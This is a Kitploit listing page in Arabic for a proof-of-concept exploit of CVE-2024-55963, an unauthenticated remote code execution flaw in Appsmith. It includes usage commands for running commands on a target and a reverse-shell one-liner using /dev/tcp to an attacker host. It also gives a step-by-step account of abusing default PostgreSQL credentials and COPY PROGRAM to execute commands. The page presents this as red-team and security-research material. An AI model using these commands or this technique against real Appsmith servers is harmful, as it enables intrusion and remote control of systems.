Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-55963 — CVE-2024-55963، يتيح تنفيذ تعليمات برمجية عن بُعد دون مصادقة على منصة Appsmith Enterprise بسبب قاعدة بيانات PostgreSQL مكوّنة بشكل خاطئ ومضمّنة افتراضيًا. | Kitploit
أدوات/GitHubGitHub/superswan/cve-2024-55963
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقسوء التكوينالفريق الأحمرأمن قواعد البيانات
GitHubsuperswan/cve-2024-55963

CVE-2024-55963

CVE-2024-55963، يتيح تنفيذ تعليمات برمجية عن بُعد دون مصادقة على منصة Appsmith Enterprise بسبب قاعدة بيانات PostgreSQL مكوّنة بشكل خاطئ ومضمّنة افتراضيًا.

عرض المستودع
24منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE‑2024‑55963 Appsmith RCE PoC

استغلال إثبات المفهوم لثغرة CVE‑2024‑55963 الذي ينفذ أوامر عشوائية أو يفتح قشرة عكسية على نسخ Appsmith القابلة للاستغلال.

يتعامل تلقائيًا مع كل من الخوادم الحديثة (التي تحمل ميزة environmentId) والإصدارات الأقدم كثيرًا من نوع “legacy” التي تسبق ظهورها، بحيث يمكنك استخدام سكربت واحد لكل الإصدارات من v1.20 وحتى آخر إصدار قابل للاستغلال v1.51.


البدء السريع

root@kitploit:~
# Run an arbitrary command (default is `id`)
python3 appsmith-rce.py https://target.example.com [email protected] password123 "whoami"

# spawn a reverse shell
python3 appsmith-rce.py https://target.example.com [email protected] password123 -revshell <ip> <port>

ملاحظة: أي بيانات اعتماد تنجح طالما أن الخادم يسمح بالتسجيل الذاتي. يحاول السكربت تسجيل الدخول أولاً ثم يلجأ إلى التسجيل إذا كان الحساب غير موجود.


كيف يعمل (نظرة عامة)

  1. التعامل مع CSRF والجلسات – يسحب التوكن من عدة نقاط نهاية محتملة أو من مخزن الكوكيز ثم يحتفظ به للمتابعة.
  2. مسار تسجيل الدخول/الاشتراك – يسجل الدخول أو يسجل مستخدمًا جديدًا باستخدام البريد الإلكتروني / كلمة المرور المقدمين.
  3. اكتشاف مساحة العمل – يلتقط مساحة عمل موجودة أو يطلق مسار الإعداد لإنشاء واحدة تلقائيًا.
  4. – يستعلم عن ؛ وإذا لم تكن موجودة يتحول إلى الوضع القديم ( فارغ).
اكتشاف البيئة
/api/v1/environments/workspaces/{id}
environmentId
  • إعداد التطبيق والصفحة – يرسل إلى /api/v1/applications ويستخرج pageId.
  • إنشاء مصدر البيانات – ينشئ مصدر بيانات PostgreSQL محليًا يشير إلى localhost:5432 ببيانات اعتماد postgres/postgres (مسموح به بواسطة ملف pg_hba.conf الافتراضي القابل للاستغلال).
  • كائنات SQL – يرفع دالة مساعدة PL/pgSQL باسم exec_cmd() بالإضافة إلى جدول مؤقت cmd_output يجمع مخرجات STDOUT.
  • تنفيذ الأوامر – يشغّل SELECT * FROM exec_cmd('<your cmd>') عبر نقطة النهاية /api/v1/actions/execute.
  • القشرة العكسية (اختياري) – ينفذ bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'.

  • المتطلبات

    • Python ≥ 3.8
    • requests

    الإصدارات المختبرة

    إصدار Appsmithالنتيجة
    1.51✅ RCE
    1.45✅ RCE
    1.30✅ RCE، المسار القديم
    1.52+❌ تم التصحيح – فشل إنشاء الدالة

    الاختلافات عن Rhino Security Labs PoC

    إثبات المفهوم هذا هو تحسين بسيط لاستغلال Rhino Security Labs (لم أدرك أنهم يملكون بالفعل PoC عامًا عندما كنت أراجع البحث).

    يستخدم PoC الخاص بـ Rhino ترويسات وكوكيز وبيانات اعتماد ثابتة. أثناء اختبار ذلك الاستغلال واجهت مشكلات عندما كان الحساب موجودًا مسبقًا على إصدارات محددة. يتيح هذا السكربت للمستخدم إدخال أي مجموعة بريد إلكتروني/كلمة مرور يختارها من سطر الأوامر. وكما ذُكر، يتم استخراج توكن CSRF بدلاً من الاعتماد على قيم مبرمجة ثابتة.

    • يعمل هذا الإصدار على الخوادم الأقدم التي لا تحتوي على نقطة نهاية Environments API.
    • مسار التنفيذ مختلف. يستخدم هذا الإصدار COPY PROGRAM داخل غلاف PL/pgSQL exec_cmd() ويستدعي واجهة برمجة التطبيقات /actions/execute، لكن هذا يُحدِث ضجيجًا أكثر. يعتمد Rhino على نقطة نهاية معاينة المخطط المدمجة لإصدار جملة COPY مؤقتة (SELECT …). تعمل نقطة النهاية تلك على اقتطاع طول المخرجات وتضيف قواعد اقتباس إضافية، لذا يصعب تمرير الأوامر الطويلة أو الحمولات المتسلسلة.
    • علامة واحدة للقشرة العكسية (:
    • يولّد أسماء عشوائية للتطبيق/مصدر البيانات/الدالة
    • بدون الاعتماد على pyfiglet
    • دعم الخوادم الأقدم عبر الكشف التلقائي عن ترويسة environmentId. يفترض استغلال Rhino أنها موجودة دائمًا.

    تعمل هذه الخيارات التصميمية معًا على جعل الاستغلال أقصر وأكثر موثوقية وأسهل لاستخدام الفرق الحمراء (red-team)، مع الاستمرار في عرض نفس الثغرة الأساسية.

    المراجع

    rhinosecuritylabs.com


    إشعار قانوني

    يُقدَّم هذا الكود لأغراض تعليمية والاختبار المصرح به فقط. من المحتمل أن يكون تشغيله ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.

    تنزيل الأداة